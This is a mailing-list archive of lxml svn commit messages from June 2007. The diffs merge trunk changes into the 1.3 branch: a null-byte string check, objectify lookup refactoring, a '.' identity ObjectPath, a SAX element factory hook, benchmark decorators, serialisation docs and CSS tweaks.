lxml/branch/lxml-1.3/CHANGES.txt (original) +++ lxml/branch/lxml-1.3/CHANGES.txt Tue Jun 12 18:10:03 2007 @@ -2,6 +2,18 @@ lxml changelog ============== +Under development +================= + +Features added +-------------- + +* ``Element.values()`` to accompany the existing ``.keys()`` and ``.items()`` + +Bugs fixed +---------- + + 1.3beta (2007-02-27) ==================== From scoder at codespeak.net Tue Jun 12 18:15:00 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 12 Jun 2007 18:15:00 +0200 (CEST) Subject: [Lxml-checkins] r44174 - in lxml/branch/lxml-1.3: . src/lxml src/lxml/tests Message-ID: <20070612161500.548978188@code0.codespeak.net> Author: scoder Date: Tue Jun 12 18:14:58 2007 New Revision: 44174 Modified: lxml/branch/lxml-1.3/CHANGES.txt lxml/branch/lxml-1.3/TODO.txt lxml/branch/lxml-1.3/src/lxml/apihelpers.pxi lxml/branch/lxml-1.3/src/lxml/objectify.pyx lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py Log: merged in revs 41642:41648 from trunk Modified: lxml/branch/lxml-1.3/CHANGES.txt ============================================================================== --- lxml/branch/lxml-1.3/CHANGES.txt (original) +++ lxml/branch/lxml-1.3/CHANGES.txt Tue Jun 12 18:14:58 2007 @@ -13,6 +13,8 @@ Bugs fixed ---------- +* Raise AssertionError when passing strings containing '\0' bytes + 1.3beta (2007-02-27) ==================== Modified: lxml/branch/lxml-1.3/TODO.txt ============================================================================== --- lxml/branch/lxml-1.3/TODO.txt (original) +++ lxml/branch/lxml-1.3/TODO.txt Tue Jun 12 18:14:58 2007 @@ -16,8 +16,6 @@ * more testing on multi-threading -* the code on extension functions and XSLT needs some refactoring - ElementTree ----------- @@ -34,8 +32,8 @@ Objectify --------- -* set special __attributes__ on ObjectifiedElement's as Python attributes, not - XML children +* emulate setting special __attributes__ on ObjectifiedElement's as Python + attributes, not XML children Features Modified: lxml/branch/lxml-1.3/src/lxml/apihelpers.pxi ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/apihelpers.pxi (original) +++ lxml/branch/lxml-1.3/src/lxml/apihelpers.pxi Tue Jun 12 18:14:58 2007 @@ -537,6 +537,21 @@ c = s[0] return 0 +cdef int isutf8py(pystring): + cdef char* s + cdef char* c_end + cdef char c + s = _cstr(pystring) + c_end = s + python.PyString_GET_SIZE(pystring) + while s < c_end: + c = s[0] + if c == c'\0': + return -1 # invalid! + if c & 0x80: + return 1 # non-ASCII + s = s + 1 + return 0 # plain 7-bit ASCII + cdef object funicode(char* s): cdef Py_ssize_t slen cdef char* spos @@ -555,7 +570,8 @@ cdef object _utf8(object s): if python.PyString_Check(s): - assert not isutf8(_cstr(s)), "All strings must be Unicode or ASCII" + assert not isutf8py(s), \ + "All strings must be Unicode or ASCII" return s elif python.PyUnicode_Check(s): return python.PyUnicode_AsUTF8String(s) @@ -581,10 +597,10 @@ if filename is None: return None elif python.PyString_Check(filename): - c_filename = _cstr(filename) - if not isutf8(c_filename): + if not isutf8py(filename): # plain ASCII! return filename + c_filename = _cstr(filename) try: # try to decode with default encoding filename = python.PyUnicode_Decode( Modified: lxml/branch/lxml-1.3/src/lxml/objectify.pyx ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/objectify.pyx (original) +++ lxml/branch/lxml-1.3/src/lxml/objectify.pyx Tue Jun 12 18:14:58 2007 @@ -42,8 +42,17 @@ cdef object AttributeError AttributeError = __builtin__.AttributeError +cdef object TypeError +TypeError = __builtin__.TypeError +cdef object ValueError +ValueError = __builtin__.ValueError cdef object IndexError IndexError = __builtin__.IndexError +cdef object StopIteration +StopIteration = __builtin__.StopIteration + +cdef object IGNORABLE_ERRORS +IGNORABLE_ERRORS = (ValueError, TypeError) cdef object list list = __builtin__.list @@ -202,7 +211,7 @@ """Return the (first) child with the given tag name. If no namespace is provided, the child will be looked up in the same one as self. """ - return _lookupChild(self, tag) + return _lookupChildOrRaise(self, tag) def __setattr__(self, tag, value): """Set the value of the (first) child with the given tag name. If no @@ -223,15 +232,14 @@ return tag = _buildChildTag(self, tag) - try: - element = _lookupChild(self, tag) - except AttributeError: + element = _lookupChild(self, tag) + if element is None: _appendValue(self, tag, value) else: _replaceElement(element, value) def __delattr__(self, tag): - child = _lookupChild(self, tag) + child = _lookupChildOrRaise(self, tag) self.remove(child) def addattr(self, tag, value): @@ -253,7 +261,7 @@ cdef tree.xmlNode* c_parent cdef tree.xmlNode* c_node if python._isString(key): - return _lookupChild(self, key) + return _lookupChildOrRaise(self, key) c_self_node = self._c_node c_parent = c_self_node.parent if c_parent is NULL: @@ -290,9 +298,8 @@ cdef tree.xmlNode* c_node if python._isString(key): key = _buildChildTag(self, key) - try: - element = _lookupChild(self, key) - except AttributeError: + element = _lookupChild(self, key) + if element is None: _appendValue(self, key, value) else: _replaceElement(element, value) @@ -421,10 +428,16 @@ c_href = _cstr(ns) c_result = _findFollowingSibling(c_node.children, c_href, c_tag, 0) if c_result is NULL: - raise AttributeError, "no such child: " + \ - cetree.namespacedNameFromNsName(c_href, c_tag) + return None return elementFactory(parent._doc, c_result) +cdef object _lookupChildOrRaise(_Element parent, tag): + element = _lookupChild(parent, tag) + if element is None: + raise AttributeError, "no such child: " + \ + _buildChildTag(parent, tag) + return element + cdef object _buildChildTag(_Element parent, tag): cdef char* c_href cdef char* c_tag @@ -910,16 +923,17 @@ """ types = [] known = set() + add_to_known = known.add for check, pytype in _TYPE_CHECKS: name = pytype.name if name not in known: - known.add(name) - types.append(pytype) + add_to_known(name) + python.PyList_Append(types, pytype) for pytype in _PYTYPE_DICT.itervalues(): name = pytype.name if name not in known: - known.add(name) - types.append(pytype) + add_to_known(name) + python.PyList_Append(types, pytype) return types cdef object _guessElementClass(tree.xmlNode* c_node): @@ -928,12 +942,11 @@ return None if value == '': return StringElement - errors = (ValueError, TypeError) for type_check, pytype in _TYPE_CHECKS: try: type_check(value) return (<PyType>pytype)._type - except errors: + except IGNORABLE_ERRORS: pass return None @@ -1426,7 +1439,6 @@ doc = element._doc ignore = bool(ignore_old) - _ValueError = ValueError StrType = _PYTYPE_DICT.get('str') c_node = element._c_node tree.BEGIN_FOR_EACH_ELEMENT_FROM(c_node, c_node, 1) @@ -1443,7 +1455,7 @@ try: if not (<PyType>pytype).type_check(value): pytype = None - except _ValueError: + except ValueError: pytype = None if pytype is None: @@ -1474,7 +1486,7 @@ if type_check(value) is not False: pytype = tested_pytype break - except _ValueError: + except ValueError: pass else: pytype = StrType @@ -1579,13 +1591,12 @@ strval = str(_value) if _pytype is None: - errors = (ValueError, TypeError) for type_check, pytype in _TYPE_CHECKS: try: type_check(strval) _pytype = (<PyType>pytype).name break - except errors: + except IGNORABLE_ERRORS: pass if _pytype is None: if _value is None: Modified: lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py (original) +++ lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py Tue Jun 12 18:14:58 2007 @@ -1196,6 +1196,15 @@ self.assertEquals(docinfo.root_name, 'html') self.assertEquals(docinfo.doctype, '') + def test_byte_zero(self): + Element = self.etree.Element + + a = Element('a') + self.assertRaises(AssertionError, setattr, a, "text", 'ha\0ho') + self.assertRaises(AssertionError, setattr, a, "tail", 'ha\0ho') + + self.assertRaises(AssertionError, Element, 'ha\0ho') + def test_encoding_tostring_utf16(self): # ElementTree fails to serialize this tostring = self.etree.tostring From scoder at codespeak.net Tue Jun 12 18:17:53 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 12 Jun 2007 18:17:53 +0200 (CEST) Subject: [Lxml-checkins] r44175 - lxml/branch/lxml-1.3/src/lxml Message-ID: <20070612161753.E4E088189@code0.codespeak.net> Author: scoder Date: Tue Jun 12 18:17:53 2007 New Revision: 44175 Modified: lxml/branch/lxml-1.3/src/lxml/etree.pyx Log: cleanup Modified: lxml/branch/lxml-1.3/src/lxml/etree.pyx ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/etree.pyx (original) +++ lxml/branch/lxml-1.3/src/lxml/etree.pyx Tue Jun 12 18:17:53 2007 @@ -1381,7 +1381,7 @@ cdef _ElementTree result result = baseclass() if context_node is None and doc is not None: - context_node = doc.getroot() + context_node = doc.getroot() if context_node is None: result._doc = doc result._context_node = context_node From scoder at codespeak.net Tue Jun 12 18:20:49 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 12 Jun 2007 18:20:49 +0200 (CEST) Subject: [Lxml-checkins] r44176 - in lxml/branch/lxml-1.3: . doc src/lxml src/lxml/tests Message-ID: <20070612162049.06D3E8189@code0.codespeak.net> Author: scoder Date: Tue Jun 12 18:20:49 2007 New Revision: 44176 Modified: lxml/branch/lxml-1.3/CHANGES.txt lxml/branch/lxml-1.3/doc/objectify.txt lxml/branch/lxml-1.3/src/lxml/objectify.pyx lxml/branch/lxml-1.3/src/lxml/sax.py lxml/branch/lxml-1.3/src/lxml/tests/test_objectify.py Log: merged in 41651:41955 from trunk Modified: lxml/branch/lxml-1.3/CHANGES.txt ============================================================================== --- lxml/branch/lxml-1.3/CHANGES.txt (original) +++ lxml/branch/lxml-1.3/CHANGES.txt Tue Jun 12 18:20:49 2007 @@ -8,6 +8,10 @@ Features added -------------- +* Support for custom Element class instantiation in lxml.sax + +* '.' represents empty ObjectPath (identity) + * ``Element.values()`` to accompany the existing ``.keys()`` and ``.items()`` Bugs fixed Modified: lxml/branch/lxml-1.3/doc/objectify.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/objectify.txt (original) +++ lxml/branch/lxml-1.3/doc/objectify.txt Tue Jun 12 18:20:49 2007 @@ -372,8 +372,8 @@ >>> print find(root).tag {ns}b -You can also use relative paths starting with a '.' that ignore the actual -root element and only inherit its namespace:: +You can also use relative paths starting with a '.' to ignore the actual root +element and only inherit its namespace:: >>> find = objectify.ObjectPath(".b[1]") >>> print find(root).tag @@ -395,6 +395,12 @@ ... AttributeError: no such child: {other}unknown +For convenience, a single dot represents the empty ObjectPath (identity):: + + >>> find = objectify.ObjectPath(".") + >>> print find(root).tag + {ns}root + ObjectPath objects can be used to manipulate trees:: >>> root = objectify.Element("{ns}root") Modified: lxml/branch/lxml-1.3/src/lxml/objectify.pyx ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/objectify.pyx (original) +++ lxml/branch/lxml-1.3/src/lxml/objectify.pyx Tue Jun 12 18:20:49 2007 @@ -1166,6 +1166,9 @@ r"(\.?)\s*(?:\{([^}]*)\})?\s*([^.{}\[\]\s]+)\s*(?:\[\s*([-0-9]+)\s*\])?", re.U).match +cdef object _RELATIVE_PATH_SEGMENT +_RELATIVE_PATH_SEGMENT = (None, None, 0) + cdef _parseObjectPathString(path): """Parse object path string into a 'hrefOnameOhrefOnameOOO' string and an index list. The index list is None if no index was used in the path. @@ -1173,6 +1176,8 @@ cdef int has_dot new_path = [] path = cetree.utf8(path.strip()) + if path == '.': + return [_RELATIVE_PATH_SEGMENT] path_pos = 0 while python.PyString_GET_SIZE(path) > 0: match = __MATCH_PATH_SEGMENT(path, path_pos) @@ -1188,7 +1193,7 @@ if python.PyList_GET_SIZE(new_path) == 0: if has_dot: # path '.child' => ignore root - python.PyList_Append(new_path, (None, None, 0)) + python.PyList_Append(new_path, _RELATIVE_PATH_SEGMENT) elif index != 0: raise ValueError, "index not allowed on root node" elif not has_dot: @@ -1234,9 +1239,7 @@ if python.PyList_GET_SIZE(new_path) == 0 and index != 0: raise ValueError, "index not allowed on root node" python.PyList_Append(new_path, (ns, name, index)) - if python.PyList_GET_SIZE(new_path) == 0 or \ - (python.PyList_GET_SIZE(new_path) == 1 and \ - new_path[0] == (None, None, 0)): + if python.PyList_GET_SIZE(new_path) == 0: raise ValueError, "invalid path" return new_path Modified: lxml/branch/lxml-1.3/src/lxml/sax.py ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/sax.py (original) +++ lxml/branch/lxml-1.3/src/lxml/sax.py Tue Jun 12 18:20:49 2007 @@ -13,12 +13,15 @@ class ElementTreeContentHandler(object, ContentHandler): """Build an lxml ElementTree from SAX events. """ - def __init__(self): + def __init__(self, makeelement=None): self._root = None self._element_stack = [] self._default_ns = None self._ns_mapping = { None : [None] } self._new_mappings = {} + if makeelement is None: + makeelement = Element + self._makeelement = makeelement def _get_etree(self): "Contains the generated ElementTree after parsing is finished." @@ -77,7 +80,8 @@ element_stack = self._element_stack if self._root is None: - element = self._root = Element(el_name, attrs, self._new_mappings) + element = self._root = \ + self._makeelement(el_name, attrs, self._new_mappings) else: element = SubElement(element_stack[-1], el_name, attrs, self._new_mappings) Modified: lxml/branch/lxml-1.3/src/lxml/tests/test_objectify.py ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/tests/test_objectify.py (original) +++ lxml/branch/lxml-1.3/src/lxml/tests/test_objectify.py Tue Jun 12 18:20:49 2007 @@ -593,6 +593,16 @@ path = objectify.ObjectPath( "root.c1[1].c2" ) self.assertFalse(path.hasattr(root)) + def test_object_path_dot(self): + root = self.XML(xml_str) + path = objectify.ObjectPath( "." ) + self.assertEquals(root.c1.c2.text, path(root).c1.c2.text) + + def test_object_path_dot_list(self): + root = self.XML(xml_str) + path = objectify.ObjectPath( [''] ) + self.assertEquals(root.c1.c2.text, path(root).c1.c2.text) + def test_object_path_dot_root(self): root = self.XML(xml_str) path = objectify.ObjectPath( ".c1.c2" ) @@ -652,9 +662,7 @@ ['root[2]', 'c1', 'c2']) self.assertRaises(ValueError, objectify.ObjectPath, - ".") - self.assertRaises(ValueError, objectify.ObjectPath, - ['']) + []) self.assertRaises(ValueError, objectify.ObjectPath, ['', '', '']) From scoder at codespeak.net Tue Jun 12 18:28:51 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 12 Jun 2007 18:28:51 +0200 (CEST) Subject: [Lxml-checkins] r44178 - in lxml/branch/lxml-1.3: . benchmark doc doc/html src/lxml src/lxml/tests Message-ID: <20070612162851.4E864818D@code0.codespeak.net> Author: scoder Date: Tue Jun 12 18:28:50 2007 New Revision: 44178 Modified: lxml/branch/lxml-1.3/CHANGES.txt lxml/branch/lxml-1.3/benchmark/bench_etree.py lxml/branch/lxml-1.3/benchmark/bench_objectify.py lxml/branch/lxml-1.3/benchmark/bench_xpath.py lxml/branch/lxml-1.3/benchmark/benchbase.py lxml/branch/lxml-1.3/doc/api.txt lxml/branch/lxml-1.3/doc/html/style.css lxml/branch/lxml-1.3/doc/mkhtml.py lxml/branch/lxml-1.3/doc/performance.txt lxml/branch/lxml-1.3/src/lxml/etree.pyx lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py Log: merged in revs 42061:42203 from trunk Modified: lxml/branch/lxml-1.3/CHANGES.txt ============================================================================== --- lxml/branch/lxml-1.3/CHANGES.txt (original) +++ lxml/branch/lxml-1.3/CHANGES.txt Tue Jun 12 18:28:50 2007 @@ -8,6 +8,8 @@ Features added -------------- +* Element.attrib now has a ``pop()`` method + * Support for custom Element class instantiation in lxml.sax * '.' represents empty ObjectPath (identity) Modified: lxml/branch/lxml-1.3/benchmark/bench_etree.py ============================================================================== --- lxml/branch/lxml-1.3/benchmark/bench_etree.py (original) +++ lxml/branch/lxml-1.3/benchmark/bench_etree.py Tue Jun 12 18:28:50 2007 @@ -3,7 +3,7 @@ from StringIO import StringIO import benchbase -from benchbase import with_attributes, with_text, onlylib, serialized +from benchbase import with_attributes, with_text, onlylib, serialized, children ############################################################ # Benchmarks @@ -77,8 +77,10 @@ root1.append(el) def bench_insert_from_document(self, root1, root2): + pos = len(root1)/2 for el in root2: - root1.insert(len(root1)/2, el) + root1.insert(pos, el) + pos = pos + 1 def bench_rotate_children(self, root): # == "1 2 3" # runs on any single tree independently @@ -102,18 +104,21 @@ def bench_clear(self, root): root.clear() - def bench_has_children(self, root): - for child in root: + @children + def bench_has_children(self, children): + for child in children: if child and child and child and child and child: pass - def bench_len(self, root): - for child in root: + @children + def bench_len(self, children): + for child in children: map(len, repeat(child, 20)) - def bench_create_subelements(self, root): + @children + def bench_create_subelements(self, children): SubElement = self.etree.SubElement - for child in root: + for child in children: SubElement(child, '{test}test') def bench_append_elements(self, root): @@ -122,103 +127,120 @@ el = Element('{test}test') child.append(el) - def bench_makeelement(self, root): + @children + def bench_makeelement(self, children): empty_attrib = {} - for child in root: + for child in children: child.makeelement('{test}test', empty_attrib) - def bench_create_elements(self, root): + @children + def bench_create_elements(self, children): Element = self.etree.Element - for child in root: + for child in children: Element('{test}test') - def bench_replace_children_element(self, root): + @children + def bench_replace_children_element(self, children): Element = self.etree.Element - for child in root: + for child in children: el = Element('{test}test') child[:] = [el] - def bench_replace_children(self, root): - Element = self.etree.Element - for child in root: - child[:] = [ child[0] ] + @children + def bench_replace_children(self, children): + els = [ self.etree.Element("newchild") ] + for child in children: + child[:] = els def bench_remove_children(self, root): for child in root: root.remove(child) def bench_remove_children_reversed(self, root): - for child in reversed(root[:]): + for child in reversed(root): root.remove(child) - def bench_set_attributes(self, root): - for child in root: + @children + def bench_set_attributes(self, children): + for child in children: child.set('a', 'bla') @with_attributes(True) - def bench_get_attributes(self, root): - for child in root: + @children + def bench_get_attributes(self, children): + for child in children: child.get('bla1') child.get('{attr}test1') - def bench_setget_attributes(self, root): - for child in root: + @children + def bench_setget_attributes(self, children): + for child in children: child.set('a', 'bla') - for child in root: + for child in children: child.get('a') def bench_root_getchildren(self, root): root.getchildren() - def bench_getchildren(self, root): - for child in root: + @children + def bench_getchildren(self, children): + for child in children: child.getchildren() - def bench_get_children_slice(self, root): - for child in root: + @children + def bench_get_children_slice(self, children): + for child in children: child[:] - def bench_get_children_slice_2x(self, root): - for child in root: - children = child[:] + @children + def bench_get_children_slice_2x(self, children): + for child in children: + child[:] child[:] - def bench_deepcopy(self, root): - for child in root: + @children + def bench_deepcopy(self, children): + for child in children: copy.deepcopy(child) def bench_deepcopy_all(self, root): copy.deepcopy(root) - def bench_tag(self, root): - for child in root: + @children + def bench_tag(self, children): + for child in children: child.tag - def bench_tag_repeat(self, root): - for child in root: + @children + def bench_tag_repeat(self, children): + for child in children: for i in repeat(0, 100): child.tag @with_text(utext=True, text=True, no_text=True) - def bench_text(self, root): - for child in root: + @children + def bench_text(self, children): + for child in children: child.text @with_text(utext=True, text=True, no_text=True) - def bench_text_repeat(self, root): + @children + def bench_text_repeat(self, children): repeat = range(500) - for child in root: + for child in children: for i in repeat: child.text - def bench_set_text(self, root): + @children + def bench_set_text(self, children): text = TEXT - for child in root: + for child in children: child.text = text - def bench_set_utext(self, root): + @children + def bench_set_utext(self, children): text = UTEXT - for child in root: + for child in children: child.text = text @onlylib('lxe') Modified: lxml/branch/lxml-1.3/benchmark/bench_objectify.py ============================================================================== --- lxml/branch/lxml-1.3/benchmark/bench_objectify.py (original) +++ lxml/branch/lxml-1.3/benchmark/bench_objectify.py Tue Jun 12 18:28:50 2007 @@ -10,6 +10,9 @@ ############################################################ class BenchMark(benchbase.BenchMarkBase): + repeat1000 = range(1000) + repeat3000 = range(3000) + def __init__(self, lib): from lxml import etree, objectify self.objectify = objectify @@ -20,37 +23,37 @@ def bench_attribute(self, root): "1 2 4" - for i in repeat(None, 3000): + for i in self.repeat3000: root.zzzzz def bench_attribute_cached(self, root): "1 2 4" cache = root.zzzzz - for i in repeat(None, 3000): + for i in self.repeat3000: root.zzzzz def bench_attributes_deep(self, root): "1 2 4" - for i in repeat(None, 3000): + for i in self.repeat3000: root.zzzzz['{cdefg}z00000'] def bench_attributes_deep_cached(self, root): "1 2 4" cache1 = root.zzzzz cache2 = cache1['{cdefg}z00000'] - for i in repeat(None, 3000): + for i in self.repeat3000: root.zzzzz['{cdefg}z00000'] def bench_objectpath(self, root): "1 2 4" path = self.objectify.ObjectPath(".zzzzz") - for i in repeat(None, 3000): + for i in self.repeat3000: path(root) def bench_objectpath_deep(self, root): "1 2 4" path = self.objectify.ObjectPath(".zzzzz.{cdefg}z00000") - for i in repeat(None, 3000): + for i in self.repeat3000: path(root) def bench_objectpath_deep_cached(self, root): @@ -58,7 +61,7 @@ cache1 = root.zzzzz cache2 = cache1['{cdefg}z00000'] path = self.objectify.ObjectPath(".zzzzz.{cdefg}z00000") - for i in repeat(None, 3000): + for i in self.repeat3000: path(root) @with_text(text=True, utext=True, no_text=True) @@ -72,7 +75,7 @@ def bench_type_inference(self, root): "1 2 4" el = root.aaaaa - for i in repeat(None, 1000): + for i in self.repeat1000: el.getchildren() @with_text(text=True) @@ -80,7 +83,7 @@ "1 2 4" el = root.aaaaa self.objectify.annotate(el) - for i in repeat(None, 1000): + for i in self.repeat1000: el.getchildren() Modified: lxml/branch/lxml-1.3/benchmark/bench_xpath.py ============================================================================== --- lxml/branch/lxml-1.3/benchmark/bench_xpath.py (original) +++ lxml/branch/lxml-1.3/benchmark/bench_xpath.py Tue Jun 12 18:28:50 2007 @@ -3,7 +3,7 @@ from StringIO import StringIO import benchbase -from benchbase import with_attributes, with_text, onlylib, serialized +from benchbase import with_attributes, with_text, onlylib, serialized, children ############################################################ # Benchmarks @@ -11,14 +11,16 @@ class XPathBenchMark(benchbase.BenchMarkBase): @onlylib('lxe') - def bench_xpath_class(self, root): + @children + def bench_xpath_class(self, children): xpath = self.etree.XPath("./*[0]") - for child in root: + for child in children: xpath(child) @onlylib('lxe') - def bench_xpath_class_repeat(self, root): - for child in root: + @children + def bench_xpath_class_repeat(self, children): + for child in children: xpath = self.etree.XPath("./*[0]") xpath(child) @@ -29,12 +31,14 @@ xpath.evaluate("./*[0]") @onlylib('lxe') - def bench_xpath_method(self, root): - for child in root: + @children + def bench_xpath_method(self, children): + for child in children: child.xpath("./*[0]") @onlylib('lxe') - def bench_xpath_old_extensions(self, root): + @children + def bench_xpath_old_extensions(self, children): def return_child(_, element): if element: return element[0] @@ -42,11 +46,12 @@ return () extensions = {(None, 'child') : return_child} xpath = self.etree.XPath("child(.)", extensions=extensions) - for child in root: + for child in children: xpath(child) @onlylib('lxe') - def bench_xpath_extensions(self, root): + @children + def bench_xpath_extensions(self, children): def return_child(_, element): if element: return element[0] @@ -56,7 +61,7 @@ try: xpath = self.etree.XPath("test:t(.)", {"test":"test"}) - for child in root: + for child in children: xpath(child) finally: del self.etree.FunctionNamespace("test")["t"] Modified: lxml/branch/lxml-1.3/benchmark/benchbase.py ============================================================================== --- lxml/branch/lxml-1.3/benchmark/benchbase.py (original) +++ lxml/branch/lxml-1.3/benchmark/benchbase.py Tue Jun 12 18:28:50 2007 @@ -78,6 +78,11 @@ function.STRING = True return function +def children(function): + "Decorator for benchmarks that require a list of root children" + function.CHILDREN = True + return function + ############################################################ # benchmark baseclass ############################################################ @@ -105,13 +110,18 @@ deepcopy = copy.deepcopy def set_property(root, fname): xml = self._serialize_tree(root) - setattr(self, fname, lambda : etree.XML(xml, etree_parser)) + if etree_parser is not None: + setattr(self, fname, lambda : etree.XML(xml, etree_parser)) + else: + setattr(self, fname, lambda : deepcopy(root)) setattr(self, fname + '_xml', lambda : xml) + setattr(self, fname + '_children', lambda : root[:]) else: def set_property(root, fname): setattr(self, fname, self.et_make_clone_factory(root)) xml = self._serialize_tree(root) setattr(self, fname + '_xml', lambda : xml) + setattr(self, fname + '_children', lambda : root[:]) attribute_list = list(izip(count(), ({}, _ATTRIBUTES))) text_list = list(izip(count(), (None, _TEXT, _UTEXT))) @@ -131,10 +141,12 @@ def _tree_builder_name(self, tree, tn, an): return '_root%d_T%d_A%d' % (tree, tn, an) - def tree_builder(self, tree, tn, an, serial): + def tree_builder(self, tree, tn, an, serial, children): name = self._tree_builder_name(tree, tn, an) if serial: name += '_xml' + elif children: + name += '_children' return getattr(self, name) def _serialize_tree(self, root): @@ -270,13 +282,14 @@ arg_count = 1 tree_tuples = self._permutations(all_trees, arg_count) - serialized = getattr(method, 'STRING', False) + serialized = getattr(method, 'STRING', False) + children = getattr(method, 'CHILDREN', False) for tree_tuple in tree_tuples: for tn in sorted(getattr(method, 'TEXT', (0,))): for an in sorted(getattr(method, 'ATTRIBUTES', (0,))): benchmarks.append((name, method_call, tree_tuple, - tn, an, serialized)) + tn, an, serialized, children)) return benchmarks @@ -315,11 +328,12 @@ return (benchmark_suites, benchmarks) -def build_treeset_name(trees, tn, an, serialized): +def build_treeset_name(trees, tn, an, serialized, children): text = {0:'-', 1:'S', 2:'U'}[tn] attr = {0:'-', 1:'A'}[an] ser = {True:'X', False:'T'}[serialized] - return "%s%s%s T%s" % (text, attr, ser, ',T'.join(imap(str, trees))[:6]) + chd = {True:'C', False:'R'}[children] + return "%s%s%s%s T%s" % (text, attr, ser, chd, ',T'.join(imap(str, trees))[:6]) def printSetupTimes(benchmark_suites): print "Setup times for trees in seconds:" @@ -327,20 +341,20 @@ print "%-3s: " % b.lib_name, for an in (0,1): for tn in (0,1,2): - print ' %s ' % build_treeset_name((), tn, an, False)[:2], + print ' %s ' % build_treeset_name((), tn, an, False, False)[:2], print for i, tree_times in enumerate(b.setup_times): print " T%d:" % (i+1), ' '.join("%6.4f" % t for t in tree_times) print -def runBench(suite, method_name, method_call, tree_set, tn, an, serial): +def runBench(suite, method_name, method_call, tree_set, tn, an, serial, children): if method_call is None: raise SkippedTest current_time = time.time call_repeat = range(10) - tree_builders = [ suite.tree_builder(tree, tn, an, serial) + tree_builders = [ suite.tree_builder(tree, tn, an, serial, children) for tree in tree_set ] times = [] @@ -348,14 +362,17 @@ for i in range(3): gc.collect() gc.disable() - t = 0 + t = -1 for i in call_repeat: args = [ build() for build in tree_builders ] t_one_call = current_time() method_call(*args) - t += current_time() - t_one_call - t = 1000.0 * t / len(call_repeat) - times.append(t) + t_one_call = current_time() - t_one_call + if t < 0: + t = t_one_call + else: + t = min(t, t_one_call) + times.append(1000.0 * t) gc.enable() del args return times @@ -364,7 +381,7 @@ for bench_calls in izip(*benchmarks): for lib, (bench, benchmark_setup) in enumerate(izip(benchmark_suites, bench_calls)): bench_name = benchmark_setup[0] - tree_set_name = build_treeset_name(*benchmark_setup[-4:]) + tree_set_name = build_treeset_name(*benchmark_setup[-5:]) print "%-3s: %-28s" % (bench.lib_name, bench_name[6:34]), print "(%-10s)" % tree_set_name, sys.stdout.flush() Modified: lxml/branch/lxml-1.3/doc/api.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/api.txt (original) +++ lxml/branch/lxml-1.3/doc/api.txt Tue Jun 12 18:28:50 2007 @@ -31,8 +31,9 @@ 3 Trees and Documents 4 Iteration 5 Error handling on exceptions - 6 xinclude - 7 write_c14n on ElementTree + 6 Serialisation + 7 xinclude + 8 write_c14n on ElementTree lxml.etree @@ -62,17 +63,16 @@ While lxml.etree itself uses the ElementTree API, it is possible to replace the Element implementation by `custom element subclasses`_. This has been -used to implement well-known XML APIs on top of lxml. The ``lxml.elements`` -package contains examples. Currently, there is a data-binding implementation -called `objectify`_, which is similar to the `Amara bindery`_ tool. - -Additionally, the `lxml.elements.classlookup`_ module provides a number of -different schemes to customize the mapping between libxml2 nodes and the -Element classes used by lxml.etree. +used to implement well-known XML APIs on top of lxml. For example, lxml ships +with a data-binding implementation called `objectify`_, which is similar to +the `Amara bindery`_ tool. + +lxml.etree comes with a number of `different lookup schemes`_ to customize the +mapping between libxml2 nodes and the Element classes used by lxml.etree. .. _`custom element subclasses`: namespace_extensions.html .. _`objectify`: objectify.html -.. _`lxml.elements.classlookup`: elements.html#lxml.elements.classlookup +.. _`different lookup schemes`: element_classes.html#setting-up-a-class-lookup-scheme .. _`Amara bindery`: http://uche.ogbuji.net/tech/4suite/amara/ @@ -228,7 +228,36 @@ etc. which are described in their respective sections below. -xinclude +Serialisation +------------- + +lxml.etree has direct support for pretty printing XML output. Functions like +``ElementTree.write()`` and ``tostring()`` support it through a keyword +argument:: + + >>> root = etree.XML("<root><test/></root>") + >>> print etree.tostring(root) + <root><test/></root> + + >>> print etree.tostring(root, pretty_print=True) + <root> + <test/> + </root> + +By default, lxml (and ElementTree) output the XML declaration only if it is +required. You can enable or disable it explicitly by passing another keyword +argument for the serialisation:: + + >>> print etree.tostring(root, xml_declaration=True) + <?xml version='1.0' encoding='ASCII'?> + <root><test/></root> + +Also see the general remarks on `Unicode support`_. + +.. _`Unicode support`: parsing.html#python-unicode-strings + + +XInclude -------- Simple XInclude support exists. You can let lxml process xinclude statements Modified: lxml/branch/lxml-1.3/doc/html/style.css ============================================================================== --- lxml/branch/lxml-1.3/doc/html/style.css (original) +++ lxml/branch/lxml-1.3/doc/html/style.css Tue Jun 12 18:28:50 2007 @@ -1,15 +1,15 @@ body { - /* CSS Hack for IE that does not respect the "margin: auto" rule at the - * document level */ + font: 13px Arial, Verdana, Helvetica, sans-serif; text-align: center; - padding: 1em; } - @media screen { + body { + padding: 1em 1em 1em 21em; + } + div.document { width: 45em; - padding-left: 21em; background-color: white; } } @@ -26,7 +26,6 @@ } div.document { - font: 13px Arial, Verdana, Helvetica, sans-serif; margin: 1em auto 1em auto; color: #222; text-align: left; @@ -50,7 +49,7 @@ /*** side menu ***/ div.sidemenu { - position: fixed; + position: absolute; top: 0px; left: 0px; width: 22em; @@ -62,6 +61,11 @@ background-color: #FFFAFA; } +html > body div.sidemenu { + /* ignored by IE -> everyone else knows 'fixed', right? */ + position: fixed; +} + div.sidemenu span.section.title { line-height: 1.5em; font-size: 130%; Modified: lxml/branch/lxml-1.3/doc/mkhtml.py ============================================================================== --- lxml/branch/lxml-1.3/doc/mkhtml.py (original) +++ lxml/branch/lxml-1.3/doc/mkhtml.py Tue Jun 12 18:28:50 2007 @@ -55,7 +55,7 @@ def merge_menu(tree, menu, name): menu_root = copy.deepcopy(menu) - tree.getroot()[1][0].append(menu_root) # html->body->div[class=document] + tree.getroot()[1][0].insert(0, menu_root) # html->body->div[class=document] for el in 